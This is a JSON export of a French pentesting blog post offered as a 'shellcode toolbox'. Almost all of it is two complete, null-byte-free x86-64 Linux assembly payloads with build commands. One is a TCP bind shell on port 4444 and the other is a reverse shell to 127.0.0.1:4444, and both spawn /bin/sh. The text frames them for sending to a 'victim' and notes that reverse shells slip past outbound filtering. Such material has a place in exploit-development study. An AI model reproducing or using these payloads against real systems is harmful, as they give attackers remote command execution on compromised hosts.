{"id":148,"date":"2018-01-21T17:02:02","date_gmt":"2018-01-21T16:02:02","guid":{"rendered":"http:\/\/pentester.blog\/?p=148"},"modified":"2019-08-18T19:49:08","modified_gmt":"2019-08-18T17:49:08","slug":"linux-shellcode-64-bits-toolbox","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=148","title":{"rendered":"Linux shellcode 64 bits &#8211; Toolbox"},"content":{"rendered":"<p>This article serves as a shellcode toolbox.<\/p>\n<p>Over time I will add to it a whole list of shellcodes serving various purposes.<\/p>\n<ul>\n<li><strong>TCP Bind Shell &#8211; Exploit Safe<\/strong><\/li>\n<\/ul>\n<p>The shellcode is sent to the victim, which listens (bind) on a TCP port (4444). The attacker initiates the connection to the victim.<\/p>\n<p>The code below is \"exploit safe\": there are no zeros in the opcodes.<\/p>\n<pre>; TCP Bind Shell - Exploit safe (no zeros in opcodes)\r\n; Listen port 4444\r\n;\r\n; nasm -f elf64 Bind-Shell-Safe.nasm -o Bind-Shell-Safe.o \r\n; ld Bind-Shell-Safe.o -o Bind-Shell-Safe\r\n\r\nglobal _start\r\n\r\n\r\n_start:\r\n\r\n\t; sock = socket(AF_INET, SOCK_STREAM, 0)\r\n\t; AF_INET = 2\r\n\t; SOCK_STREAM = 1\r\n\t; syscall number 41 \r\n\r\n\txor rax, rax\r\n\tmov al, 41\r\n\r\n\txor rdi, rdi\r\n\tmov dil, 2\r\n\t\r\n\txor rsi, rsi\r\n\tmov sil, 1\r\n\r\n\txor rdx, rdx\r\n\t\r\n\tsyscall\r\n\r\n\t; copy socket descriptor to rdi for future use \r\n\r\n\tmov rdi, rax\r\n\r\n\t; server.sin_family = AF_INET \r\n\t; server.sin_port = htons(PORT)\r\n\t; server.sin_addr.s_addr = INADDR_ANY\r\n\t; bzero(&amp;server.sin_zero, 8)\r\n\r\n\txor rax, rax \r\n\r\n\tpush rax\r\n\r\n\tmov dword [rsp-4], eax\r\n\tmov word [rsp-6], 0x5c11\r\n\r\n\tmov word [rsp-8], 0x1FF\r\n\tsub word [rsp-8], 0x1FD\r\n\r\n\tsub rsp, 8\r\n\r\n\t; bind(sock, (struct sockaddr *)&amp;server, sockaddr_len)\r\n\t; syscall number 
49\r\n\r\n\txor rax, rax\r\n\tmov al, 49\t\r\n\r\n\tmov rsi, rsp\r\n\t\r\n\txor rdx, rdx\r\n\tmov dl, 16\t\r\n\r\n\tsyscall\r\n\r\n\t; listen(sock, MAX_CLIENTS)\r\n\t; syscall number 50\r\n\r\n\txor rax, rax\r\n\tmov al, 50\r\n\r\n\txor rsi, rsi\r\n\tmov sil, 2\r\n\t\r\n\tsyscall\r\n\r\n\t; new = accept(sock, (struct sockaddr *)&amp;client, &amp;sockaddr_len)\r\n\t; syscall number 43\r\n\t\r\n\txor rax, rax\r\n\tmov al, 43\r\n\r\n\tsub rsp, 16\r\n\tmov rsi, rsp\r\n        mov byte [rsp-1], 16\r\n        sub rsp, 1\r\n        mov rdx, rsp\r\n\r\n        syscall\r\n\r\n\t; store the client socket descriptor \r\n\tmov r9, rax \r\n\r\n        ; close parent\r\n\r\n\txor rax, rax\r\n\tmov al, 3\t\r\n\r\n        syscall\r\n\r\n        ; duplicate sockets\r\n\r\n        ; dup2 (new, old)\r\n        mov rdi, r9\r\n        \r\n\txor rax, rax\r\n\tmov al, 33        \r\n\r\n\txor rsi, rsi\r\n\r\n        syscall\r\n\r\n\txor rax, rax\r\n\tmov al, 33        \r\n\r\n\txor rsi, rsi\r\n\tmov sil, 1\t\r\n\r\n        syscall\r\n\r\n\txor rax, rax\r\n\tmov al, 33\r\n\r\n\txor rsi, rsi\r\n\tmov sil, 2\t\r\n\r\n        syscall\r\n\r\n        ; execve\r\n\r\n        ; First NULL push\r\n\r\n        xor rax, rax\r\n        push rax\r\n\r\n        ; push \/bin\/\/sh in reverse\r\n\r\n        mov rbx, 0x68732f2f6e69622f\r\n        push rbx\r\n\r\n        ; store \/bin\/\/sh address in RDI\r\n\r\n        mov rdi, rsp\r\n\r\n        ; Second NULL push\r\n        push rax\r\n\r\n        ; set RDX\r\n        mov rdx, rsp\r\n\r\n        ; Push address of \/bin\/\/sh\r\n        push rdi\r\n\r\n        ; set RSI\r\n\r\n        mov rsi, rsp\r\n\r\n        ; Call the Execve syscall\r\n        add rax, 59\r\n        syscall<\/pre>\n<ul>\n<li><strong>TCP Reverse Shell &#8211; Exploit Safe<\/strong><\/li>\n<\/ul>\n<p>The shellcode is sent to the victim, which initiates the connection to the attacker (here on 127.0.0.1) on a TCP port (4444). 
The advantage is that outbound traffic is less filtered than inbound traffic.<\/p>\n<p>The code below is \"exploit safe\": there are no zeros in the opcodes.<\/p>\n<pre>; TCP Reverse Shell - Exploit safe (no zeros in opcodes) \r\n; Connect on 127.0.0.1 on port 4444\r\n;\r\n; nasm -f elf64 Reverse-Shell-Safe.nasm -o Reverse-Shell-Safe.o\r\n; ld Reverse-Shell-Safe.o -o Reverse-Shell-Safe\r\n\r\nglobal _start\r\n\r\n\r\n_start:\r\n\r\n\t; sock = socket(AF_INET, SOCK_STREAM, 0)\r\n\t; AF_INET = 2\r\n\t; SOCK_STREAM = 1\r\n\t; syscall number 41 \r\n\r\n\txor rax, rax\r\n\tadd al, 41\r\n\t\r\n\txor rdi, rdi\r\n\tinc dil\r\n\tinc dil\r\n\r\n\txor rsi, rsi\r\n\tinc sil\t\r\n\r\n\txor rdx, rdx\r\n\tsyscall\r\n\r\n\t; copy socket descriptor to rdi for future use \r\n\r\n\tmov rdi, rax\r\n\r\n\r\n\t; server.sin_family = AF_INET \r\n\t; server.sin_port = htons(PORT)\r\n\t; server.sin_addr.s_addr = inet_addr(\"127.0.0.1\")\r\n\t; bzero(&amp;server.sin_zero, 8)\r\n\r\n\txor rax, rax \r\n\r\n\tpush rax\r\n\t\r\n\t;mov dword [rsp-4], 0x0100007f\r\n\tmov dword [rsp -4], 0x9A999A18\r\n\tsub dword [rsp -4], 0x99999999\r\n\r\n\tmov word [rsp-6], 0x5c11\r\n\t\r\n\t;mov word [rsp-8], 0x2\r\n        mov word [rsp-8], 0x1FF\r\n        sub word [rsp-8], 0x1FD\r\n\r\n\tsub rsp, 8\r\n\r\n\r\n\t; connect(sock, (struct sockaddr *)&amp;server, sockaddr_len)\r\n\t\r\n\txor rax, rax\r\n\tadd al, 42\r\n\r\n\tmov rsi, rsp\r\n\t\r\n\txor rdx, rdx\r\n\tadd dl, 16\t\r\n\r\n\tsyscall\r\n\r\n\r\n        ; duplicate sockets\r\n\r\n        ; dup2 (new, old)\r\n        \r\n\txor rax, rax\r\n\tadd al, 33\r\n\r\n        xor rsi, rsi\r\n\tsyscall\r\n\r\n        xor rax, rax\r\n\tadd al, 33\r\n\r\n        xor rsi, rsi\r\n\tinc sil\r\n\r\n\tsyscall\r\n\r\n        xor rax, rax\r\n\tadd al, 33\r\n\r\n        xor rsi, rsi\r\n\tinc sil\r\n\tinc sil\t\r\n\r\n\tsyscall\r\n\r\n\r\n        ; execve\r\n\r\n        ; First NULL push\r\n\r\n        xor rax, rax\r\n  
      push rax\r\n\r\n        ; push \/bin\/\/sh in reverse\r\n\r\n        mov rbx, 0x68732f2f6e69622f\r\n        push rbx\r\n\r\n        ; store \/bin\/\/sh address in RDI\r\n\r\n        mov rdi, rsp\r\n\r\n        ; Second NULL push\r\n        push rax\r\n\r\n        ; set RDX\r\n        mov rdx, rsp\r\n\r\n        ; Push address of \/bin\/\/sh\r\n        push rdi\r\n\r\n        ; set RSI\r\n\r\n        mov rsi, rsp\r\n\r\n        ; Call the Execve syscall\r\n        add rax, 59\r\n        syscall\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>This article serves as a shellcode toolbox. Over time I will add to it a whole list of shellcodes serving various purposes. TCP Bind Shell &#8211; Exploit Safe The shellcode is sent to the victim, which listens (bind) on a TCP port (4444). The attacker initiates the connection to &hellip; <a href=\"https:\/\/hacktarus.fr\/?p=148\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">Linux shellcode 64 bits &#8211; 
Toolbox<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-148","post","type-post","status-publish","format-standard","hentry","category-shellcode"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/148","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=148"}],"version-history":[{"count":9,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/148\/revisions"}],"predecessor-version":[{"id":164,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/148\/revisions\/164"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=148"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=148"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=148"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}